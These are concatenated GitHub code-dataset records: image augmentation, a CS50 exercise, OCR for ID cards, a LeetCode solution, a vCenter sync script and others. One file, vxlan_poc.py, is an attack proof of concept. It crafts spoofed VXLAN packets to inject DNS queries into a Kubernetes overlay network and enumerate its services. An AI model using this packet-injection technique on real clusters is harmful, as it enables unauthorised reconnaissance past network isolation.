mix_h], dtype=np.float32)\r\n else:\r\n occ_box = None\r\n else:\r\n occ_box = None\r\n return image, occ_box, overlap\r\n\r\n\r\ndef random_background(image, bbox, crop_settings, min_rate, max_rate):\r\n \"\"\"\r\n Randomly crop a background region from the search image whose size and shape are similar to the target's\r\n Two uses:\r\n overlay the background patch directly on the target box to simulate occlusion\r\n crop a search region centered on that box, then move the target box onto this background region, to strengthen the network's discrimination and context-recognition abilities\r\n \"\"\"\r\n ih, iw = image.shape[:2]\r\n\r\n bbox_xywh = corner2center(bbox)\r\n w = int(bbox_xywh[2] * rand(min_rate, max_rate))\r\n h = int(bbox_xywh[3] * rand(min_rate, max_rate))\r\n\r\n # range of valid top-left coordinates for the background region\r\n boundary = np.array([0., 0., iw - w - 1., ih - h - 1.], np.float32)\r\n\r\n # protected zone: a region that must not be cropped\r\n # when looking for a position to translate the target to, the search region built around the target's new position must not still contain the target, which would cause confusion\r\n # using crop_settings, define a forbidden zone centered on the target in the same way the search region is built; the target must be moved outside this zone\r\n # when randomly cropping a region of the image to act as an occluder, it is enough that the occluder does not intersect the target (a small intersection may be allowed to sharpen discrimination)\r\n if isinstance(crop_settings, dict):\r\n t = crop_settings['context_amount'] * (w + h)\r\n size = int(math.sqrt((w + t) * (h + t)) * crop_settings['crop_size_rate'])\r\n area = np.array([bbox_xywh[0], bbox_xywh[1], size, size], np.float32)\r\n else:\r\n area = bbox_xywh * np.array([1., 1., 1. + crop_settings, 1.
+ crop_settings], np.float32)\r\n\r\n area = center2corner(area)\r\n # top-left coordinates of the protected zone\r\n area = area + np.array([-w, -h, 0., 0.], np.float32)\r\n\r\n # must not exceed the image area\r\n x1y1 = np.maximum(area[:2], np.array([0., 0.], np.float32))\r\n x2y2 = np.minimum(area[2:], np.array([iw - 1., ih - 1.], np.float32))\r\n corner = np.concatenate([x1y1, x2y2])\r\n\r\n mask1 = np.zeros(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, boundary))\r\n mask1[box[1]: box[3] + 1, box[0]: box[2] + 1] = 1.\r\n\r\n mask2 = np.ones(shape=(ih, iw), dtype=np.float32)\r\n box = list(map(int, corner))\r\n mask2[box[1]: box[3] + 1, box[0]: box[2] + 1] = 0.\r\n\r\n mask = mask1 * mask2\r\n\r\n pos = np.where(mask == 1.)\r\n num = pos[0].shape[0]\r\n\r\n if num > 0:\r\n if num > 1:\r\n choice = random.randint(0, num-1)\r\n else:\r\n choice = 0\r\n y1, x1 = pos[0][choice], pos[1][choice]\r\n if y1 + h < ih and x1 + w < iw:\r\n mixed_box = np.array([x1, y1, x1 + w, y1 + h], dtype=np.float32)\r\n else:\r\n mixed_box = None\r\n else:\r\n mixed_box = None\r\n return mixed_box\r\n","repo_name":"bit-bcilab/SiamDCA","sub_path":"training/Augmentation.py","file_name":"Augmentation.py","file_ext":"py","file_size_in_byte":21335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"15955762350","text":"\"\"\"\nImplement a program that expects exactly two command-line arguments:\n- in sys.argv[1], the name (or path) of a JPEG or PNG to read\n (i.e., open) as input\n- in sys.argv[2], the name (or path) of a JPEG or PNG to write\n (i.e., save) as output\n\nThe program should then overlay shirt.png (which has a transparent background)\non the input after resizing and cropping the input to be the same size, saving\nthe result as its output.\n\nOpen the input with Image.open, per pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.open, resize and crop the input with ImageOps.fit, per pillow.readthedocs.io/en/stable/reference/ImageOps.html#PIL.ImageOps.fit, using default values for method, bleed, and centering, overlay the shirt with Image.paste, per pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.paste, and save the result with Image.save, per pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.save.\n\nThe program should instead exit via sys.exit:\n- if the user does not specify exactly two command-line arguments,\n- if the input's and output's names do not end in .jpg, .jpeg, or .png,\n case-insensitively,\n- if the input's name does not have the same extension as the output's name, or\n- if the specified input does not exist.\n\nAssume that the input will be a photo of someone posing in just the right way,\nlike these demos, so that, when they’re resized and cropped, the shirt appears\nto fit perfectly.\n\"\"\"\n\n\nimport os\nimport sys\nfrom PIL import Image, ImageOps\n\n\ndef main():\n file_input, file_output = get_input()\n convert(file_input, file_output)\n\n\ndef convert(img_name_in, img_name_out=\"out.png\"):\n try:\n shirt = Image.open(\"shirt.png\") # .convert('RGBA')\n img = Image.open(img_name_in).convert(\"RGBA\")\n img_out = img\n # match photo and shirt\n img_out = ImageOps.fit(img_out, shirt.size)\n # paste over it - overlay\n img_out.paste(shirt, shirt)\n # save to file_output\n img_out_rgb = img_out.convert(\"RGB\")\n img_out_rgb.save(img_name_out)\n # close the image x2\n shirt.close()\n img.close()\n except FileNotFoundError:\n sys.exit(\"FileNotFoundError\")\n\n\ndef get_input() -> tuple:\n if len(sys.argv) < 3:\n
sys.exit(\"Too few command-line arguments\")\n elif len(sys.argv) > 3:\n sys.exit(\"Too many command-line arguments\")\n elif (\n not os.path.isfile(sys.argv[1])\n or sys.argv[1].lower().rstrip().split(\".\")[-1] not in [\"png\", \"jpg\", \"jpeg\"]\n or sys.argv[2].lower().rstrip().split(\".\")[-1] not in [\"png\", \"jpg\", \"jpeg\"]\n ):\n sys.exit(\"Invalid input\")\n elif sys.argv[1][-3:] != sys.argv[2][-3:]:\n sys.exit(\"Input and output have different extensions\")\n else:\n return (sys.argv[1], sys.argv[2])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alex-anast/cs50p_2023","sub_path":"6_fileIO/shirt/shirt.py","file_name":"shirt.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17327527686","text":"__author__ = 'Hernan Y.Ke'\nfrom operator import itemgetter,attrgetter,methodcaller\ndt=[('New','NY'),('Tok','CA')]\n\nfor city in sorted(dt,key=itemgetter(1)):\n print(city)\n\nccname= itemgetter(1,0) # change index order\nfor city in dt:\n print(ccname(city))\n\n#attrgetter\ns = 'a b c'\nupcase = methodcaller('upper')\nprint(upcase(s)) #s.upper(), str.upper(s)\nhipen = methodcaller('replace',' ','-')\nprint(hipen(s))\n","repo_name":"rengokantai/obfluentpy3ed","sub_path":"CP5_firstclass_func/L5_23_itemgetter_multiple.py","file_name":"L5_23_itemgetter_multiple.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39394708652","text":"#!/usr/bin/python3\n\n\nfrom argparse import ArgumentParser\nfrom switch import VpnSwitch\n\n\ndef main() -> None:\n parser = ArgumentParser(description=\"m4gnum's vpn server\")\n\n parser.add_argument(\"ip\", type=str, help=\"vpn server's ip\")\n parser.add_argument(\"port\", type=int, help=\"vpn server's port\")\n parser.add_argument(\"--base\", type=str, help=\"vpn ip range base\", default=\"172.20.20\")\n parser.add_argument(\"--vendor\", type=str, help=\"vpn mac address vendor id\", default=\"fc:d8:47\")\n\n args = parser.parse_args()\n\n with VpnSwitch(args.ip, args.port, args.base, args.vendor) as switch:\n print(f\"[+] up @ {args.base}.0/24\")\n while True:\n if switch.pending():\n switch.accept()\n switch.drain()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"omerk2511/m4chi","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"2882588314","text":"import ipaddress\n\nfrom scapy.all import *\n\n# outer\nnodemac=\"52:54:00:22:f6:29\"\noutersrc=\"10.123.0.10\"\nouterdst=\"10.123.0.20\"\nvxlanport=4789\nvni=1\n\n# inner\nbroadcastmac=\"ae:b0:b2:b5:13:20\" # VTEP\nbastion=\"10.123.0.8\"\ndestination=\"10.100.0.10\"\ndstport=53\nsrcport=55353\n\nvxlan=Ether(dst=nodemac)/IP(src=outersrc,dst=outerdst)/UDP(sport=vxlanport,dport=vxlanport)/VXLAN(vni=vni,flags=\"Instance\")\n\npacket=vxlan/Ether(dst=broadcastmac)/IP(src=bastion,dst=destination)/UDP(sport=srcport,dport=dstport)/DNS(rd=1,qd=DNSQR(qname=\"any.any.svc.cluster.local\",qtype=\"SRV\"))\n\nsniff = AsyncSniffer(filter=f\"udp and port {srcport}\", count=1)\nsniff.start()\n\nsendp(packet, loop=0)\nsniff.join()\n\npkt = sniff.results[0]\ndns = pkt.getlayer(3)\nfor i in range(0,len(dns.an.layers())):\n rrsrv = dns.an.getlayer(i)\n name = rrsrv.target.decode().rstrip('.')\n 
print(f\"{name}:{rrsrv.port}\")\n\n","repo_name":"jpts/k8s-network-abuse","sub_path":"vxlan_poc.py","file_name":"vxlan_poc.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18465311681","text":"import numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot\r\nfrom PIL import Image\r\nfrom numpy import asarray\r\nfrom scipy.spatial.distance import cosine\r\nfrom mtcnn.mtcnn import MTCNN\r\n# from keras_applications.imagenet_utils import _obtain_input_shape\r\nfrom keras_vggface.vggface import VGGFace\r\nfrom keras_vggface.utils import preprocess_input\r\nimport ssl\r\nimport matplotlib.pyplot as plt\r\n# %matplotlib inline\r\nfrom PIL import Image, ImageFilter,ImageEnhance\r\nimport imutils\r\nfrom tesserocr import PyTessBaseAPI\r\nimport tempfile\r\nfrom string import digits\r\nimport re\r\nimport pandas as pd\r\nfrom datetime import date\r\n\r\ndef rotate(filename):\r\n image = cv2.imread(filename)\r\n rotated=cv2.rotate(image,cv2.ROTATE_90_COUNTERCLOCKWISE)\r\n plt.imshow( rotated)\r\n cv2.imwrite('cmnd_test.jpg',rotated)\r\ndef equalizeHist(filename):\r\n image = cv2.imread(filename)\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY);\r\n gray = cv2.equalizeHist(gray)\r\n cv2.imwrite('cmnd_test.jpg',gray)\r\ndef detect_chu(filename):\r\n image = cv2.imread(filename)\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bitwise_not(gray)\r\n thresh = cv2.threshold(gray, 0, 255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n\r\n coords = np.column_stack(np.where(thresh > 0))\r\n angle = cv2.minAreaRect(coords)[-1]\r\n\r\n if angle < -45:\r\n angle = -(90 + angle)\r\n\r\n # otherwise, just take the inverse of the angle to make\r\n # it positive\r\n else:\r\n angle = -angle\r\n\r\n\r\n # rotate the image to deskew it\r\n (h, w) = image.shape[:2]\r\n center = (w // 2, h // 2)\r\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\r\n rotated = cv2.warpAffine(image, M, (w, h),\r\n flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\r\n\r\n\r\n cv2.putText(rotated, \"Angle: {:.2f} degrees\".format(angle),\r\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n # show the output image\r\n print(\"[INFO] angle: {:.3f}\".format(angle))\r\n cv2.imwrite('cmnd_test.jpg',rotated)\r\n\r\ndef detect_cmnd(filename,output):\r\n image = cv2.imread(filename)\r\n ratio = image.shape[0] / 300.0\r\n orig = image.copy()\r\n image = imutils.resize(image, height = 300)\r\n\r\n # convert the image to grayscale, blur it, and find edges\r\n # in the image\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bilateralFilter(gray, 11, 17, 17)\r\n edged = cv2.Canny(gray, 30, 200)\r\n cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = imutils.grab_contours(cnts)\r\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]\r\n screenCnt = None\r\n for c in cnts:\r\n # approximate the contour\r\n peri = cv2.arcLength(c, True)\r\n approx = cv2.approxPolyDP(c, 0.015 * peri, True)\r\n\r\n # if our approximated contour has four points, then\r\n # we can assume that we have found our screen\r\n if len(approx) == 4:\r\n screenCnt = approx\r\n break\r\n startY=screenCnt[0][0][0]\r\n startX=screenCnt[0][0][1]\r\n endY=screenCnt[1][0][1]\r\n endX=screenCnt[3][0][0]\r\n 
im=image[startY:endY, startX:endX]\r\n plt.imshow(im)\r\n cv2.imwrite(output,im)\r\n # cv2.imshow('image_all',im)\r\n # cv2.waitKey(0)\r\n\r\n\r\ndef kiemtratinh(tinhthanh,tinh):\r\n for i in range(len(tinhthanh)):\r\n a=tinhthanh[i].find(tinh)\r\n if a==0:\r\n return 1\r\n#keras==2.2.5\r\n# tensorflow== 1.14\r\ndef multipartimage_to_numpyimage(multipartfile):\r\n image_bytedata = multipartfile.read()\r\n\r\n decoded = np.frombuffer(image_bytedata, np.uint8)\r\n np_image = cv2.imdecode(decoded, -1)\r\n\r\n return np_image\r\n\r\ndef extract_face(pixels, required_size=(224, 224)):\r\n\r\n detector = MTCNN()\r\n # detect faces in the image\r\n results = detector.detect_faces(pixels)\r\n # extract the bounding box from the first face\r\n x1, y1, width, height = results[0]['box']\r\n x2, y2 = x1 + width, y1 + height\r\n # extract the face\r\n face = pixels[y1: y2, x1: x2]\r\n # resize pixels to the model size\r\n image = Image.fromarray(face)\r\n image = image.resize(required_size)\r\n face_array = asarray(image)\r\n # cv2.imwrite('a.jpg',face_array)\r\n return face_array\r\n\r\n\r\ndef get_embeddings(filenames):\r\n ssl._create_default_https_context = ssl._create_unverified_context\r\n\r\n # extract faces\r\n faces = [extract_face(f) for f in filenames]\r\n # convert into an array of samples\r\n samples = asarray(faces, 'float32')\r\n # prepare the face for the model, e.g. center pixels\r\n samples = preprocess_input(samples, version=2)\r\n # create a vggface model\r\n model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg')\r\n # perform prediction\r\n yhat = model.predict(samples)\r\n return yhat\r\n\r\n\r\ndef is_match(known_embedding, candidate_embedding, thresh=0.5):\r\n # calculate distance between embeddings\r\n score = cosine(known_embedding, candidate_embedding)\r\n if (score <= thresh):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef rotated(filename,file_out):\r\n image = cv2.imread(filename)\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bitwise_not(gray)\r\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n\r\n coords = np.column_stack(np.where(thresh > 0))\r\n angle = cv2.minAreaRect(coords)[-1]\r\n\r\n if angle < -45:\r\n angle = -(90 + angle)\r\n\r\n # otherwise, just take the inverse of the angle to make\r\n # it positive\r\n else:\r\n angle = -angle\r\n\r\n # rotate the image to deskew it\r\n (h, w) = image.shape[:2]\r\n center = (w // 2, h // 2)\r\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\r\n rotated = cv2.warpAffine(image, M, (w, h),\r\n flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\r\n\r\n # show the output image\r\n # print(\"[INFO] angle: {:.3f}\".format(angle))\r\n # plt.imshow(image)\r\n cv2.imwrite(file_out, rotated)\r\n\r\n\r\ndef detect_cmnd(image,filename_out):\r\n # image = cv2.imread('cmnd_test.jpg')\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n # ratio = image.shape[0] / 300.0\r\n # orig = image.copy()\r\n # image = imutils.resize(image, height = 300)\r\n\r\n # convert the image to grayscale, blur it, and find edges\r\n # in the image\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bilateralFilter(gray, 11, 17, 17)\r\n edged = cv2.Canny(gray, 30, 200)\r\n\r\n cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = imutils.grab_contours(cnts)\r\n cnts = sorted(cnts, key=cv2.contourArea, 
reverse=True)[:10]\r\n screenCnt = None\r\n\r\n for c in cnts:\r\n # approximate the contour\r\n peri = cv2.arcLength(c, True)\r\n approx = cv2.approxPolyDP(c, 0.015 * peri, True)\r\n\r\n # if our approximated contour has four points, then\r\n # we can assume that we have found our screen\r\n if len(approx) == 4:\r\n screenCnt = approx\r\n break\r\n\r\n startY = screenCnt[0][0][1]\r\n startX = screenCnt[1][0][0]\r\n endY = screenCnt[2][0][1]\r\n endX = screenCnt[3][0][0]\r\n im = image[startY:endY, startX:endX]\r\n # plt.imshow(im)\r\n # cv2.waitKey(0)\r\n cv2.imwrite(filename_out, im)\r\n\r\n\r\nIMAGE_SIZE = 1800\r\nBINARY_THREHOLD = 180\r\n\r\n\r\nsize = None\r\n\r\n\r\ndef get_size_of_scaled_image(im):\r\n global size\r\n if size is None:\r\n length_x, width_y = im.size\r\n factor = max(1, int(IMAGE_SIZE / length_x))\r\n size = factor * length_x, factor * width_y\r\n return size\r\ndef set_image_dpi(file_path):\r\n im = Image.open(file_path)\r\n length_x, width_y = im.size\r\n factor = max(1, int(IMAGE_SIZE / length_x))\r\n size = factor * length_x, factor * width_y\r\n # size = (1800, 1800)\r\n im_resized = im.resize(size, Image.ANTIALIAS)\r\n temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.jpg')\r\n temp_filename = temp_file.name\r\n im_resized.save(temp_filename, dpi=(300, 300))\r\n return temp_filename\r\n\r\ndef image_smoothening(img):\r\n ret1, th1 = cv2.threshold(img, BINARY_THREHOLD, 255, cv2.THRESH_BINARY)\r\n ret2, th2 = cv2.threshold(th1, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n blur = cv2.GaussianBlur(th2, (1, 1), 0)\r\n ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n return th3\r\n\r\ndef remove_noise_and_smooth(file_name):\r\n img = cv2.imread(file_name, 0)\r\n filtered = cv2.adaptiveThreshold(img.astype(np.uint8), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 41,\r\n 3)\r\n kernel = np.ones((1, 1), np.uint8)\r\n opening = cv2.morphologyEx(filtered, cv2.MORPH_OPEN, kernel)\r\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\r\n img = image_smoothening(img)\r\n or_image = cv2.bitwise_or(img, closing)\r\n return or_image\r\n\r\ndef process_image_for_ocr(file_path):\r\n # TODO : Implement using opencv\r\n temp_filename = set_image_dpi(file_path)\r\n im_new = remove_noise_and_smooth(temp_filename)\r\n return im_new\r\n\r\ndef detect_text(filename):\r\n\r\n image = cv2.imread(filename)\r\n img = cv2.fastNlMeansDenoisingColored(image, None, 10, 10, 5, 13)\r\n\r\n kernel = np.ones((1, 1), np.uint8)\r\n img = cv2.dilate(img, kernel, iterations=1)\r\n img = cv2.erode(img, kernel, iterations=1)\r\n\r\n cv2.imwrite('cmnd1.jpg', img)\r\n image = cv2.imread('cmnd1.jpg')\r\n image = cv2.resize(image, None, fx=1.2, fy=1.2, interpolation=cv2.INTER_CUBIC)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n # que quan (hometown)\r\n x = 300\r\n y = 368\r\n w = 600\r\n h = 100\r\n\r\n nativecountry = image[y:y + h, x:x + w]\r\n\r\n ret1, th1 = cv2.threshold(nativecountry, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('quequan.jpg', th1)\r\n\r\n # name\r\n x = 220\r\n y = 190\r\n w = 630\r\n h = 100\r\n name = image[y:y + h, x:x + w]\r\n\r\n ret2, th2 = cv2.threshold(name, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n # th2 = cv2.adaptiveThreshold(th2.astype(np.uint8), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 41,3)\r\n # th2 = cv2.morphologyEx(th2, cv2.MORPH_OPEN, kernel)\r\n # th2 = cv2.morphologyEx(th2, cv2.MORPH_CLOSE, kernel)\r\n
cv2.imwrite('name.jpg', th2)\r\n\r\n # birthday\r\n\r\n x = 270\r\n y = 310\r\n w = 630\r\n h = 60\r\n birthday = image[y:y + h, x:x + w]\r\n ret3, th3 = cv2.threshold(birthday, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('birthday.jpg', th3)\r\n\r\n # dia chi (address)\r\n\r\n x = 280\r\n y = 470\r\n w = 640\r\n h = 110\r\n\r\n address = image[y:y + h, x:x + w]\r\n\r\n # address = cv2.bitwise_not(address)\r\n thresh = cv2.threshold(address, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)[1]\r\n # thresh = cv2.bitwise_not(thresh)\r\n ret4, th4 = cv2.threshold(address, 1, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('address.jpg', thresh)\r\n\r\n # so cmnd (ID card number)\r\n x = 460\r\n y = 145\r\n w = 330\r\n h = 50\r\n\r\n number = image[y:y + h, x:x + w]\r\n\r\n ret5, th5 = cv2.threshold(number, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU + cv2.THRESH_TRUNC)\r\n\r\n cv2.imwrite('sochungminh.jpg', th5)\r\n\r\n result=[]\r\n images = ['address.jpg', 'name.jpg', 'birthday.jpg', 'quequan.jpg', 'sochungminh.jpg']\r\n with PyTessBaseAPI(path='D:/tessdata-master/.', lang='vie') as api:\r\n for img in images:\r\n api.SetImageFile(img)\r\n a=api.GetUTF8Text()\r\n result.append(a)\r\n kq = []\r\n print(kq)\r\n dc=result[0].replace('\\n', ' ')\r\n ten = result[1].replace('\\n', ' ')\r\n ngay = result[2].replace('\\n', ' ')\r\n que = result[3].replace('\\n', ' ')\r\n socmnd = result[4].replace('\\n', ' ')\r\n df = pd.read_excel(r'tinh.xlsx',\r\n encoding='utf-8') # for an earlier version of Excel, you may need to use the file extension of 'xls'\r\n tinhthanh = df['Tỉnh']\r\n st = result[0]\r\n t = st.split('\\n')\r\n dc = t[1]\r\n dc = dc.split(', ')\r\n tinh = dc[2]\r\n if kiemtratinh(tinhthanh, tinh) == 1:\r\n NGAYSINH = result[2]\r\n NGAYSINH = NGAYSINH.split('-')\r\n ngay = NGAYSINH[0].split(' ')[2]\r\n ngay = int(ngay)\r\n thang = NGAYSINH[1]\r\n thang = int(thang)\r\n nam = NGAYSINH[2].split(' ')\r\n nam = nam[0]\r\n nam = int(nam)\r\n\r\n today = date.today()\r\n year = today.strftime('%m/%d/%Y')\r\n a = year[6:10]\r\n a = int(a)\r\n if (((a - nam) >= 15) & ((a - nam) <= 150)) & ((ngay >= 1) & (ngay <= 31)) & ((thang >= 1) & (thang <= 12)):\r\n kq = 'Đăng ký thành công' # 'Registration successful'\r\n else:\r\n kq = 'Thông tin sai sót, đề nghị nhập lại' # 'Information incorrect, please re-enter'\r\n else:\r\n kq = 'Không tồn tại tỉnh' # 'Province does not exist'\r\n\r\n return kq","repo_name":"ThuyMo/backend","sub_path":"server-fe/server/image_process_server/server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"20239810620","text":"# 332. Reconstruct Itinerary\n\n# You are given a list of airline tickets where tickets[i] = [fromi, toi] represent the departure and the arrival airports of one flight. Reconstruct the itinerary in order and return it.\n\n# All of the tickets belong to a man who departs from \"JFK\", thus, the itinerary must begin with \"JFK\". If there are multiple valid itineraries, you should return the itinerary that has the smallest lexical order when read as a single string.\n\n# For example, the itinerary [\"JFK\", \"LGA\"] has a smaller lexical order than [\"JFK\", \"LGB\"].\n# You may assume all tickets form at least one valid itinerary.
You must use all the tickets once and only once.\n\n# Example 1:\n# Input: tickets = [[\"MUC\",\"LHR\"],[\"JFK\",\"MUC\"],[\"SFO\",\"SJC\"],[\"LHR\",\"SFO\"]]\n# Output: [\"JFK\",\"MUC\",\"LHR\",\"SFO\",\"SJC\"]\n\n# Example 2:\n# Input: tickets = [[\"JFK\",\"SFO\"],[\"JFK\",\"ATL\"],[\"SFO\",\"ATL\"],[\"ATL\",\"JFK\"],[\"ATL\",\"SFO\"]]\n# Output: [\"JFK\",\"ATL\",\"JFK\",\"SFO\",\"ATL\",\"SFO\"]\n# Explanation: Another possible reconstruction is [\"JFK\",\"SFO\",\"ATL\",\"JFK\",\"ATL\",\"SFO\"] but it is larger in lexical order.\n\nfrom typing import List\n\n\nclass Solution:\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n graph = {}\n res = []\n \n for item in tickets:\n start, dest = item\n if start not in graph:\n graph[start] = []\n graph[start].append(dest)\n \n for item in graph.values():\n item.sort()\n \n print(graph)\n\n def dfs(node):\n if node in graph:\n dest = graph[node]\n while dest and len(dest) > 0:\n nextNode = dest.pop(0)\n dfs(nextNode)\n res.append(node)\n \n dfs('JFK')\n \n return res[::-1]\n\n# test\nsolution = Solution()\nres = solution.findItinerary([[\"JFK\",\"SFO\"],[\"JFK\",\"ATL\"],[\"SFO\",\"ATL\"],[\"ATL\",\"JFK\"],[\"ATL\",\"SFO\"]])\nprint(res)","repo_name":"HarryXiong24/code-collection","sub_path":"Data Structure & Algorithm/Data Structure/Graph/DFS/Problem/332. Reconstruct Itinerary/332. Reconstruct Itinerary.py","file_name":"332. Reconstruct Itinerary.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"}
{"seq_id":"34152216237","text":"\"\"\"\nMemory-related functions.\n\"\"\"\nfrom typing import Optional\n\nimport click\nimport psutil\n\nfrom pydupfinder.pentode_fi.number import parse_size\n\n\ndef parse_memory_limit(\n ctx: click.Context,\n param: click.Parameter,\n value: Optional[str],\n) -> Optional[int]:\n \"\"\"\n Return the value of max-memory option given as a string.\n\n Takes into account letter suffixes; the '%' suffix means a percentage of total memory.\n\n :param ctx: Click Context.\n :param param: Click Parameter.
\n :param value: Option value as a string.\n :returns: Option value as a number.\n :raise click.BadParameter: Exception raised if the option value\n cannot be parsed or is out of\n range, to signal click that the\n option value is not valid.\n \"\"\"\n if value is None:\n return None\n if value.endswith(\"%\"):\n val = value.removesuffix(\"%\")\n val = val.rstrip()\n try:\n parsed = float(val)\n except ValueError:\n raise click.BadParameter( # pylint: disable=raise-missing-from\n f\"Cannot parse size '{value}'.\"\n )\n if parsed < 0 or parsed > 100:\n raise click.BadParameter(\n \"The percentage must be between 0 and 100.\"\n )\n total: int = psutil.virtual_memory().total\n return int(total * parsed / 100)\n return parse_size(ctx, param, value)\n","repo_name":"avysk/pydupfinder","sub_path":"pydupfinder/pentode_fi/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"74758675883","text":"# This Python script is used as a standalone exe in the SCO runbook.\n# It is the second step of the automation and performs the sync on the libraries taken from the DB table.\n# It uses vCenter APIs to perform the sync\n\nimport requests\nimport json\nimport urllib3\nimport pyodbc\nfrom datetime import datetime\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n#Make DB connection\n\nserver = ':'\ndatabase = ''\nusername = ''\npassword = ''\nconn = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL Server};SERVER='+server+';DATABASE='+database+';UID='+username+';PWD='+ password)\ncursor = conn.cursor()\n\n# This function performs the query to take one lib at a time whose status is 'pending'\n# Once the function gets the lib, the sync is triggered and the status in the DB is changed to 'Triggered'\n\ndef sync_subscribed_library(sessionid, payload):\n \n cookie_value = \"sessionid=;vmware-api-session-id=\" + sessionid + \"\"\n lib_headers = {\n 'cookie': cookie_value,\n }\n cursor.execute(\"select top(1) [SubscribedLibraryID] from WHERE SyncStatus = ?\", 'pending')\n date=datetime.now()\n synclibraryid=cursor.fetchone()\n if (synclibraryid is not None):\n synclibraryid=str(synclibraryid[0])\n print(\"processing with \" +synclibraryid+ \" at \" +str(date))\n sync_url = \"https:///rest/com/vmware/content/subscribed-library/id:\" + synclibraryid + \"?~action=sync\"\n try:\n print(\"in try\")\n response4 = requests.request(\"POST\", sync_url, headers=lib_headers, data=payload, verify=False)\n print(\" sync triggered with ID: \" + synclibraryid)\n date = datetime.now()\n cursor.execute(\"UPDATE SET SyncStatus = ? WHERE SubscribedLibraryID = ?\", 'Triggered', synclibraryid)\n cursor.execute(\"UPDATE SET SyncDate = ? WHERE SubscribedLibraryID = ?\", date, synclibraryid)\n cursor.commit()\n print(\"db update done\")\n except requests.exceptions.ProxyError as e:\n print(\"in except\")\n print(e)\n date2=datetime.now()\n cursor.execute(\"UPDATE SET SyncStatus = ? WHERE SubscribedLibraryID = ?\", 'Triggered',synclibraryid)\n cursor.execute(\"UPDATE SET SyncDate = ? WHERE SubscribedLibraryID = ?\", date2, synclibraryid)\n cursor.commit()\n print(\"db update done in except\" )\n\n except Exception as e:\n print(\"in except\")\n print(e)\n date2 = datetime.now()\n cursor.execute(\"UPDATE SET SyncStatus = ? WHERE SubscribedLibraryID = ?\", 'Triggered',synclibraryid)\n 